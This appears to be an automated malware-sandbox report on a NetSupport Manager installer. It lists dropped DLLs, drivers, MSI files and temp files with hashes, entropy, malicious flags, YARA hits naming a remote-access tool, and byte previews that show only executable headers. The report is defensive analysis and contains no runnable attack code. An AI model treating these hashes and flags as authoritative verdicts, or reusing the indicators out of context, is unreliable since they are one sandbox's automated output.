                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIFCA3.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250616
                                                                                      Entropy (8bit):6.25532114530443
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                      MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                      SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                      SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                      SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.../.../.../n$./.../=%./.../n$./.../n$./.../..L/.../..\/.../.../.../=%./.../=%./.../=%./.../..X/.../=%./.../Rich.../................PE..L.....Y...........!.....\...x......V........p.......................................H..............................PK......,=......................................................................`...@............p...............................text...MZ.......\.................. ..`.rdata.......p.......`..............@..@.data...4:...P.......>..............@....rsrc................X..............@..@.reloc...V.......X...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\SourceHash{CBB68368-7767-4CFF-B3E5-211488346702}

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):1.1624961454168947
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:JSbX72FjCAGiLIlHVRpzh/7777777777777777777777777vDHFVBfHIxVYOp01z:JUQI53hoxyN8F
                                                                                      MD5:E7D0F5F2A9CBE17BABA6A76F207883A6
                                                                                      SHA1:80081546AE688F3FAD7033614CB89C3B82AEC9B7
                                                                                      SHA-256:4CBFFADE3F8C2606A1D85F681CF4693719325847BB3BF468148658EE5CF969B6
                                                                                      SHA-512:0B4CBF0259053F5BA90F57A94900EDD2AD59FB6EBB874B9D71DF043CD81B817FBC3517F3CAFA16F32676F7F1BE913522CC73FB2B7558ECF72FA42FDA69B00EF9
                                                                                      Malicious:false
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\e6def7.msi

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                      Category:dropped
                                                                                      Size (bytes):41645568
                                                                                      Entropy (8bit):7.965918169264881
                                                                                      Encrypted:false
                                                                                      SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                      MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                      SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                      SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                      SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\e6def7.msi, Author: Joe Security
                                                                                      Preview:......................>...................|...............8........6....................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-.........../.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;................................................................... ..............................................."...!...*...#...$...%...&...'...(...).......+...4...-......./...0...1...2...3...6...5...C...7...J...M...:...<.......=...>...?.......A...B....=..E.......F...G...H...I...Z...Q...L...N.......O...P.......f...S...T...U...V...W...X...Y...K...[...\...]...^..._...`...a...b...c...d...e...h...g...t...i...j...k...l...m...n...o...p...q...r...s...v...u.......w...x...y...z...

                                                                                      C:\Windows\Installer\e6defa.msi

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                      Category:dropped
                                                                                      Size (bytes):41645568
                                                                                      Entropy (8bit):7.965918169264881
                                                                                      Encrypted:false
                                                                                      SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                      MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                      SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                      SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                      SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\e6defa.msi, Author: Joe Security
                                                                                      Preview:......................>...................|...............8........6....................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-.........../.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;................................................................... ..............................................."...!...*...#...$...%...&...'...(...).......+...4...-......./...0...1...2...3...6...5...C...7...J...M...:...<.......=...>...?.......A...B....=..E.......F...G...H...I...Z...Q...L...N.......O...P.......f...S...T...U...V...W...X...Y...K...[...\...]...^..._...`...a...b...c...d...e...h...g...t...i...j...k...l...m...n...o...p...q...r...s...v...u.......w...x...y...z...

                                                                                      C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):24576
                                                                                      Entropy (8bit):2.2143805252812587
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:UhC1rnTTPQDkcr+kHfhIWbrAinC2f109effKMuOk9rqvktfhWbrArXP:f1j3Ub3Ck1EWfKMQqY/
                                                                                      MD5:EDE71E88544444AEDB0A1054744C5D3B
                                                                                      SHA1:95CB9FC98ABD9933DFA91973830F4804CC4E5A36
                                                                                      SHA-256:55BD9FAB938F637FF1161C6641408E5DFD33CBE6C7A543419B32EA930F8FB328
                                                                                      SHA-512:EB209EADB32BB29C1CCB7E7240743E29FB4C888DD76F42C9FD9B3361CC8A77669A8334C3FAEDC2811D192423376DCCB08E129CC8E672C2B26965C33C131015D0
                                                                                      Malicious:false
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):144128
                                                                                      Entropy (8bit):4.98417021664642
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:DMAyYdTmPJbgqcnDcVVZl6FhWr80/35qr2pe/kyNAMxkEe:D1U81c50hGv5Kee/k4x6
                                                                                      MD5:EEA96B9571108A588FB0DBC47DB9F8BE
                                                                                      SHA1:3DD69D11C3023FDD9429658BA25995950781E575
                                                                                      SHA-256:D324F2C1E8697197152BC2E4E8AA67F8660B3B93887A754AEC81791377EF1045
                                                                                      SHA-512:760749F298E7E2C8E081B4A436EA1185B6366E53A5B91640061EA73A9C0AC33AB385BD0588B9886F80F695B297BA46FFC58B3BDE0DD2BC9AEA127FDDCBC0C624
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............C...C...C...C...CD..C...C...C...C=..C...C...C...C...C...CRich...C........................PE..L......Y.................@...................P....@..................................~......................................4T..(.......(k...............3...........................................................P...............................text....5.......@.................. ..`.rdata.......P.......P..............@..@.data....)...`...0...`..............@....rsrc...(k.......p..................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1014517
                                                                                      Entropy (8bit):5.410941472702708
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:TFfxq8RfKF0Dux6lvJ3c7v/3dd7kGcoyq+HaRgEM:TFfxq8xKCE6lVcbP7kGcjaRgEM
                                                                                      MD5:6A9703C8ED1D37644EBE45D3FE22D5A2
                                                                                      SHA1:A05425BCD7C6FCB7D73E69452DBA9156926E93A0
                                                                                      SHA-256:53020D58965449A8EC4EB83DF989FFFF7B06BD6840DAA8F3F3CF2EB8C3651684
                                                                                      SHA-512:FD8179934579E5B569AFCC725EB2B795A082A16F276D4D5A7B4F19B76BED5466C3DE27A14F00DD7ED986D95DFA4A7ED49E3CEA69DCF4FA6162377EA0C66C65A6
                                                                                      Malicious:false
                                                                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 09:59:37.236 [4684]: Command line: D:\wd\compilerTemp\BMT.i51yo0aa.beh\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 09:59:37.255 [4684]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 09:59:37.299 [4684]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 09:59:37.299 [4684]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 09:59:37.299 [

                                                                                      C:\Windows\SysWOW64\pcimsg.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\Installer\MSI1387.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):56288
                                                                                      Entropy (8bit):5.934323135362062
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:j8OV1u6Jr2pe/6QHDHf/ckSCr2pe/DryHDHf/ckI:jRee/RjHpee/KjH0
                                                                                      MD5:5758E67FBD1984B6E43648C8568FB4EE
                                                                                      SHA1:6C1CD32D27EA2719668FE1ADEBDD8AF626814007
                                                                                      SHA-256:2723D3EC822F369E1C083085335C86D9FD94367DDF36BB2047BBCE0DAE59AA7D
                                                                                      SHA-512:C3743E4499509E384E00C14C0C5467A0C2F337201C868A1426010F5A086F3B5C74A4E97D006042835902E0332D2833FCCD30ECFA9DD8D17F3AB109976B5AC6B1
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.................................Rich....................PE..L.....oe...........!.........x............... .... .................................x.....@.......................................... ...v...........~...]...........................................................................................text............................... ..`.rsrc....v... ...x..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\System32\client32provider.dll

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):104928
                                                                                      Entropy (8bit):6.462496520992136
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Pm0oPFxNrTUEtzjHlBs/Z5GQFvSeGjreejq:loxrTUEtFBsPGIaemeN
                                                                                      MD5:0488F2B6A068F6FAD881A45E427068A2
                                                                                      SHA1:B1E6B587D1F1A18C3E8F324C06BDE36608DF11A2
                                                                                      SHA-256:E4227BED56D1EA54FE8D4A0D60F68C1B805433F5A083C889F1EBE61D5901654E
                                                                                      SHA-512:56A2615AA3BF101430830C6832E494B2448CF8BCE1DA850AC0A9F6D55304508851590D360666B8926369E1FA925514F544BD5BA24E02192113018B6869079499
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\System32\client32provider.dll, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^..?...?...?...I...?...G...?...G...?...?...?...I...?...I...?...I...?...I...?...I...?..Rich.?..................PE..d...}.oe.........." ................TX..............................................q...............................................p&...............p..\....`.......<...]..............................................................p............................text............................... ..`.rdata...W.......X..................@..@.data....$...0......................@....pdata.......`....... ..............@..@.rsrc...\....p......................@..@.reloc...............6..............@..B................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\System32\drivers\nskbfltr.sys

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33408
                                                                                      Entropy (8bit):6.382369861010622
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mbjTW3njbfudD/lgV1co3+iMMGi/cKnLEJFs:uW3WD/lgv+F7KnN
                                                                                      MD5:1C2143ADEAB91D77EB5A9624BD28B283
                                                                                      SHA1:5F8BB1A5A6AE56AF8BBD60ACD1C4C67CFD8E26B1
                                                                                      SHA-256:F897746F7FC866B9FC100F36D6896B883E55B08C5AE9E7D8358FCDB937C6C097
                                                                                      SHA-512:0D9A5C2130496F4EF4B06AD55BE7BA84190A36E0D8412FA11E816EF53BBAE413CB11742C053644D6F4DF44D19746DB0EA420D0426B83EB1A298D42E9E48D11A2
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\System32\drivers\nskbfltr.sys, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r2..6S.W6S.W6S.W...W5S.W..'W4S.W..&W4S.W...W4S.W6S.W$S.W@..W5S.W@..W7S.W...W;S.W...W4S.W@..W7S.W...W5S.W...W7S.W...W7S.WRich6S.W........PE..d...Q.(Y.........."......J...$.......(..........................................................................................................<...............(....d..........4....P...............................................P...............................text....=.......>.................. ..h.rdata..H....P.......B..............@..H.data........`.......J..............@....pdata..(............N..............@..HPAGE....9............R.............. ..`INIT.................X.............. ....rsrc................^..............@..B.reloc...............b..............@..B........................................................................................................................................................

                                                                                      C:\Windows\System32\drivers\nskbfltr2.sys

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34008
                                                                                      Entropy (8bit):6.39207103344199
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:QbG73Znjbfudxpl7x1u33FrFteVVJKZg0ymNjB:B3ZWxpl7KFcKZgCH
                                                                                      MD5:FE21DE1984A1DB19D520F01BADAE7087
                                                                                      SHA1:13DEE984774E0E3605B8D9E34E73F79EFDAAB1E3
                                                                                      SHA-256:E7E628DE2ED025AD146328E86FA7AB83A79962972CC847263F984EDC567D6E7C
                                                                                      SHA-512:1C79A62CB6E695A5178D8C28CACC765977981A9FA0E005126D29CB82042F175569C88D51E3003148116F9CBAD68412DC597817B2C1C9688E1EA34ACF79E56AF5
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p2..4S.W4S.W4S.W...W7S.W..'W6S.W..&W6S.W...W6S.W4S.W%S.WB..W7S.WB..W5S.W...W9S.W...W6S.WB..W5S.W...W7S.W...W5S.W...W5S.WRich4S.W........PE..d.....cT.........."......H...$.......&..............................................."..........................................................<...............(....b..."......4....P...............................................P...............................text...];.......<.................. ..h.rdata..$....P.......@..............@..H.data........`.......H..............@....pdata..(............L..............@..HPAGE.................P.............. ..`INIT.................V.............. ....rsrc................\..............@..B.reloc...............`..............@..B........................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF0D6419ABD2A4DB1E.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF0FEDE590CADF6325.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF226C31DA0D33C1F5.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):1.4320464191386586
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/KHHT38vUuPQDkcr+kHfhIWbrAinC2f109effKMuOk9rqvktfhWbrArXP:yHHzgUb3Ck1EWfKMQqY/
                                                                                      MD5:E2A16A16EEBB509A3F2837A5ADDE0EC2
                                                                                      SHA1:9BFC3F8B2F5C95A2BC0279AE8F5EF55E4B5813E3
                                                                                      SHA-256:F55354AAFB6554143F11BA4EB5C547F05E27CCE44DF17064527C401DFB3952F0
                                                                                      SHA-512:BA355CED15827C655D7A1326F2BE70F4D761B3BD9E141E07F87F247FD8B8ACCF7635B1B45D76F373622450E49DB4D6F79BDBB9399E66D6D509BDCA0BA215B64A
                                                                                      Malicious:false
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF246B003BA5E6B4E1.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF3165F8158C55A294.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):1.4320464191386586
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/KHHT38vUuPQDkcr+kHfhIWbrAinC2f109effKMuOk9rqvktfhWbrArXP:yHHzgUb3Ck1EWfKMQqY/
                                                                                      MD5:E2A16A16EEBB509A3F2837A5ADDE0EC2
                                                                                      SHA1:9BFC3F8B2F5C95A2BC0279AE8F5EF55E4B5813E3
                                                                                      SHA-256:F55354AAFB6554143F11BA4EB5C547F05E27CCE44DF17064527C401DFB3952F0
                                                                                      SHA-512:BA355CED15827C655D7A1326F2BE70F4D761B3BD9E141E07F87F247FD8B8ACCF7635B1B45D76F373622450E49DB4D6F79BDBB9399E66D6D509BDCA0BA215B64A
                                                                                      Malicious:false
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF7BAACB7E39E71AB3.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):24576
                                                                                      Entropy (8bit):2.2143805252812587
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:UhC1rnTTPQDkcr+kHfhIWbrAinC2f109effKMuOk9rqvktfhWbrArXP:f1j3Ub3Ck1EWfKMQqY/
                                                                                      MD5:EDE71E88544444AEDB0A1054744C5D3B
                                                                                      SHA1:95CB9FC98ABD9933DFA91973830F4804CC4E5A36
                                                                                      SHA-256:55BD9FAB938F637FF1161C6641408E5DFD33CBE6C7A543419B32EA930F8FB328
                                                                                      SHA-512:EB209EADB32BB29C1CCB7E7240743E29FB4C888DD76F42C9FD9B3361CC8A77669A8334C3FAEDC2811D192423376DCCB08E129CC8E672C2B26965C33C131015D0
                                                                                      Malicious:false
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF814F21E344879B50.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):0.4737706284412294
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:YXgrqvktfhWbrAr1cr+kHfhIWbrAinC2f109effKMuOkaDhP:YKqYg3Ck1EWfKM1h
                                                                                      MD5:E808B87F9A8F3E70D0E10FC1D6E9CFDC
                                                                                      SHA1:6E0544F7D41B9161DBF9C38EF174A00970FA58B8
                                                                                      SHA-256:BC2BD0B2AFFBE824148E7FCFF866126F1BB9A19CF01199861E377774BA0CE552
                                                                                      SHA-512:F05DDD0F260D718E44A845434A3AEEC1400B30798CD766EDC4BE44635F15B9F809B9B34526D312E31ED3046CCD2D608302C6F2525D2F8F7DE24CF416AB439F44
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF8865730D1987C3CB.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DF8A6A81CE29CE5A03.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):24576
                                                                                      Entropy (8bit):2.2143805252812587
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:UhC1rnTTPQDkcr+kHfhIWbrAinC2f109effKMuOk9rqvktfhWbrArXP:f1j3Ub3Ck1EWfKMQqY/
                                                                                      MD5:EDE71E88544444AEDB0A1054744C5D3B
                                                                                      SHA1:95CB9FC98ABD9933DFA91973830F4804CC4E5A36
                                                                                      SHA-256:55BD9FAB938F637FF1161C6641408E5DFD33CBE6C7A543419B32EA930F8FB328
                                                                                      SHA-512:EB209EADB32BB29C1CCB7E7240743E29FB4C888DD76F42C9FD9B3361CC8A77669A8334C3FAEDC2811D192423376DCCB08E129CC8E672C2B26965C33C131015D0
                                                                                      Malicious:false
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DFDC5F29407CDC34A8.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):1.4320464191386586
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/KHHT38vUuPQDkcr+kHfhIWbrAinC2f109effKMuOk9rqvktfhWbrArXP:yHHzgUb3Ck1EWfKMQqY/
                                                                                      MD5:E2A16A16EEBB509A3F2837A5ADDE0EC2
                                                                                      SHA1:9BFC3F8B2F5C95A2BC0279AE8F5EF55E4B5813E3
                                                                                      SHA-256:F55354AAFB6554143F11BA4EB5C547F05E27CCE44DF17064527C401DFB3952F0
                                                                                      SHA-512:BA355CED15827C655D7A1326F2BE70F4D761B3BD9E141E07F87F247FD8B8ACCF7635B1B45D76F373622450E49DB4D6F79BDBB9399E66D6D509BDCA0BA215B64A
                                                                                      Malicious:false
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DFE0DAFDBE2AD67F7A.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.06882469791652747
                                                                                      Encrypted:false
